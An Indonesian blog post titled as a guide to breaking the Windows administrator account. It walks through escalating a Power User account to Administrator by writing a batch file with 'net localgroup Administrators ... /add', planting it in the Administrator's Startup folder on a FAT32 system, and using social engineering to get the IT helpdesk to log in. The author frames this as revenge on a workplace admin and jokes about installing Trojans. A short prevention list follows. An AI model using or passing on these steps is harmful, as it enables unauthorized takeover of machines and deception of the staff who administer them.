Login To Facebook
Δ Selamat Datang Di Otocomputer Δ

Cara Jebol password Administrator

Pake save mode bisa cuma kalau user dengan nama administrator belum di password, mengingat biasanya user administrator cuma dilihatin kalau kita masuk save mode trus masuk aja dech, khan belum di password

buat yang udah di password semua kita masih bisa masuk kok, caranya:

Anda sering kesal karena tidak bisa masuk ke control panel ? Tidak bisa install program baru karena system anda diproteksi oleh admin ? Justru kekesalan itulah yang memberikan dorongan kreatifitas untuk mendapatkan ide meningkatkan permission userid yang kita gunakan.
Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya dengan beberapa langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya “NEPU”

Cek terlebih dahulu permission (group user) anda:

Langkah yang perlu dilakukan adalah sbb:
Start > Run > CMD , gue ketik deh ; net user

Hasilnya:

Cocuments and SettingsRISKI>net use User accounts for UNKNOWN ——————————————————————————- __vmware_user__ Administrator Guest HelpAssistant RISKI SUPPORT_388945a0 The command completed successfully.

Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik lagi; net user RISKI

Cocuments and SettingsRISKI>net user riski User name RISKI Full Name Comment User’s comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 6/21/2005 9:12 AM Password expires Never Password changeable 6/21/2005 9:12 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 8/19/2005 10:10 PM Logon hours allowed All Local Group Memberships *Power User Global Group memberships *None The command completed successfully.

Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue gak bisa nginstal program2 kesayangan gue ? hemm…. Tunggu aja luh admin brengsek dan pelit, tunggu aja tanggal mainnya! He..he..h.e……

Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32, huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu? salah satu contohnya adalah dalam FAT32 seluruh user yang login pada OS tersebut dapat mengakses setiap profile yang ada di bawah direktori document and settings termasuk seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?…

Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,

1. Pertama kita buat batch file untuk mendaftarkan local account kita untuk dijadikan account Maha Dewa yaitu ADMINISTRATOR alias sang pengatus semuanya gitu loh!

Kita gunakan command net localgroup, perhatikan batch file di bawah ini

———————————-start——————————
@echo off
net localgroup Administrators RISKI /add
exit
———————————-end—————————–

ketikkan script tersebut di notepad lalu save as dengan nama admin.bat

2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi sang Admin yang PeLiT he..h.e…he…he..
Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan admin.bat pada direktori startUp administrator pada alamat berikut ;
Cocuments and SettingsAdministratorStart MenuProgramsStartup
Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara otomatis begitu sang admin login dengan accountnya, maka seketika itu account RISKI yang cuma punya pangkat Power User maka pada saat itu juga RISKI sekaligus mempunya 2 pangkat, yaitu Power User dan Adminsitrators he…he…. Ketika kita menjadi sang Maha Dewa, you know what should you do next! ?

FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:

———————————–start———————————
@echo off
net user user_name_kamu /add
net localgroup Administrator user_name_kamu /add
exit
————————————end———————————

Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh kapan nih si doi login dan kemakan perangkap gue?…. bisa botak nih nunggunya!) saran gue sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau masalah kecil si IT Helpdesk login admin dulu untuk ngecek segala sesuatunya, maklum kalo login di user biasa serba terbatas hi…hi…hi..hi… jadi dari modal pengalam gue mudah mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita… dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang instal AAtolls buat scaning PC si admin wakakakkakak…… atau instal Trojan Client di situ yang nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu yang turut membantu niat jelekmu!

“Merusak pekerjaan banyak orang, memperbaiki pekerjaan segelintir orang, mudah -mudahan komunitas ini menjadi segelintir orang itu, amieenn….”

Artikel ringan ini cuma buat para newbies aja yang kesel sama tindakan admin yang semena mena dan tidak adil, setidaknya ada beberapa pelajaran yang dapat di petik walaupun sesederhana apapun, mudahan dapat menjadi pelajaran yang berharaga. Berikut ini pencegahan yang perlu di lakukan:

1. Enkripsi NTFS lebih baik dari pada FAT32 terutama untuk sekurity dan manajemen file. (oh iya!.. walaupun pake NTFS kita bisa manfaatin autoexec.bat lhoo… untuk eksekusi file admin.bat tadi he..he..he… No Perfect System In The World Man!! )

2. Sebaiknya Proteksi program program administrasi berikut ini;
Regedit, MSCONFIG, GPEDIT.MSC, CommandPromt dan semua program administrasi lainnya yang memungkinkan user memicu file2 kurang ajar di exekusi OS secara otomatis, sengaja ataupun tidak di sengaja.

3. Password BIOS, dan set boot sequence hanya dari hardiks saja, ini mencegah user tidak bisa booting dengan device lain, karena banyak program bertebaran untuk mereset password sang mahadewa, salah satu contohnya dengan Offline NT Password Recovery. (kecuali user nekad banged mencopot baterai CMOS dengan membongkar PC, gile usaha banged dah!!!)

4. Untuk sang admin, sering sering di cek donk kalo ke usernya, kalo udah kecolongan cepet2 di turunin lagi tuh pangkatnya, dan yang sering banget kejadian nih buat temen2 gue kalo login admin, DI LOG OUT DONK!!!!!! jangan ditinggal gitu aza!

1 comments:

rashi_blogspot mengatakan...

tanks banget buat infonya

Poskan Komentar

Silahkan Komentar anda.Jangan spam ya...

"U Comment I Follow"

 
Template by: widodo dc © 2010